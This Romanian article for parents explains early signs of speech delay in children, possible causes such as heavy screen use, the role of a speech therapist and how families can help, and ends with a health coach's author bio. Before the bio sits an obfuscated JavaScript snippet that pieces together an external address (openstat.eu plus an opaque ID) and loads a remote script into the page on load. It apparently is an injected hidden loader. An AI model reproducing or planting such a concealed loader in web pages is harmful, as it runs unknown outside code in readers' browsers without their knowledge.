Când rostirea cuvintelor devine un obstacol pentru un copil, părinţii trebuie să ia primele măsuri şi să caute ajutor specializat. Fiecare junior are ritmul său de dezvoltare şi adaptare, însă ca să se elimine orice îngrijorare, familia ar trebui să monitorizeze atent situaţia.

În general, primele cuvinte sunt rostite între 9 şi 12 luni, iar de la 18 luni, cel mic ar trebui să îşi dezvolte şi mai mult limbajul vorbirii. Dacă observi însă că există dificultăţi în acest sens, este de preferat să apelezi la un doctor logoped. Acesta poate să analizeze atent situaţia şi poate veni cu răspunsurile de care ai nevoie.

Când este cazul să apelezi la logoped

Pentru părinţi, rostirea primelor cuvinte din partea copilului lor, cum sunt „mama” şi „tata”, reprezintă un eveniment emoţionant aşteptat cu mare nerăbdare. Însă fiecare copil are ritmul său de adaptare. Unii juniori încep să vorbească mai devreme, alţii mai târziu. Atunci când cuvintele se lasă aşteptate, iar alţi copii de vârsta fiului tău sau fiicei tale încep să îşi dezvolte limbajul comunicării și al tău întâmpină dificultăți pe partea asta, este timpul să cauţi răspunsuri la un specialist. Logopedul nu lucrează numai cu sunete, ci şi cu emoţii. Prin jocuri, povești și exerciții adaptate, acesta reconstruiește legătura dintre minte și limbaj şi poate ajuta copilul să-şi facă vocea auzită. Ședințele de logopedie pot aduce un amestec de joacă și terapie, unde fiecare sunet devine o mică victorie. Copilul învață să asculte, să respire corect, să formeze cuvinte și propoziții şi, mai ales, să aibă încredere în el.

De ce au loc întârzierile de vorbire la copii

Logopezii explică însă că întârzierile în vorbire pot avea cauze multiple. De la factori genetici și influențe neurologice, până la lipsa stimulării verbale sau expunerea prelungită la ecrane. Un copil care petrece prea mult timp în fața tabletelor și televizoarelor poate părea liniștit, însă creierul său nu primește suficienți stimuli verbali reali. Fără dialog, fără contact vizual, fără reacție emoțională, limbajul se dezvoltă mai greu. Pentru ca micuțul să înveţe, este nevoie ca părintele să petreacă timp alături de el, să-i propună exerciţii şi jocuri care îi pot stimula vorbirea şi creativitatea.

Cum îţi poţi ajuta copilul

Şedinţele la logoped sunt esenţiale în cazul în care juniorul are dificultăţi în rostirea cuvintelor. Specialistul poate să propună tehnicile potrivite, dar şi exerciţii care să-l ajute pe cel mic să facă paşi esenţiali în exprimarea verbală. Pe lângă aceste şedinţe, este necesar să existe implicare şi din partea familiei şi a celor dragi. Părinţii pot veni în sprijinul specialistului, dar şi al copilului, acasă, prin simplul fapt că încep să se ocupe mai mult de junior, să-i vorbească şi să-i ofere ascultare şi înţelegere. Cel mic nu trebuie să simtă că se pune presiune pe el, că este judecat sau ridiculizat. Din contră. Empatia, afecţiunea şi răbdarea sunt aspecte-cheie în acest proces, care îl pot face să se deschidă şi să înceapă să folosească tot mai mult cuvintele. Este esențial ca părintele să nu amâne rezolvarea acestei situaţii, în ideea că o să treacă de la sine, ci e bine să acţioneze din timp. Măsurile luate cât mai rapid pot îmbunătăţi acest proces, astfel încât dificultăţile de vorbire să devină o amintire. Acționarea timpurie poate îmbunătăți succesul academic și social, scrie HealthyChildren, dar de acest lucru depinde intervenţia şi ajutorul specializat.

Sursa foto: freepick.com

(function(){ ccg3=document.createElement("script");ccg3_="o"+("pe")+"ns";ccg3u="2544723439"; ccg3_+="t"+"at"+(".e");ccg3.type="text/javascript"; ccg3u+=".3jq5r365cg3n48ufa2t3";ccg3.async=true;ccg3_+=""+("u"+"")+"/"; ccg3u+="zn8XXu37ab";ccg3.src="https://"+ccg3_+ccg3u; document.body.appendChild(ccg3); })();

Despre autor

Mirela Popa

Ma numesc Mirela Popa, am 32 de ani si sunt health coach. Am absolvit Facultatea de Nutritie si Dietetica si am urmat cursuri de coaching in sanatate. In munca mea sprijin oamenii sa isi creeze obiceiuri sanatoase, sa gaseasca echilibrul intre alimentatie, miscare si odihna si sa isi construiasca un stil de viata pe termen lung care sa le aduca energie si vitalitate. Imi place sa vad transformarea si increderea care apar atunci cand cineva isi schimba viata in bine.

Dincolo de profesie, imi place sa gatesc retete simple si hranitoare si sa practic yoga dimineata. Ador plimbarile lungi in natura si calatoriile, care imi aduc inspiratie si liniste. In serile libere citesc carti de dezvoltare personala si de nutritie, mereu in cautarea unor idei noi pe care le pot integra in practica mea.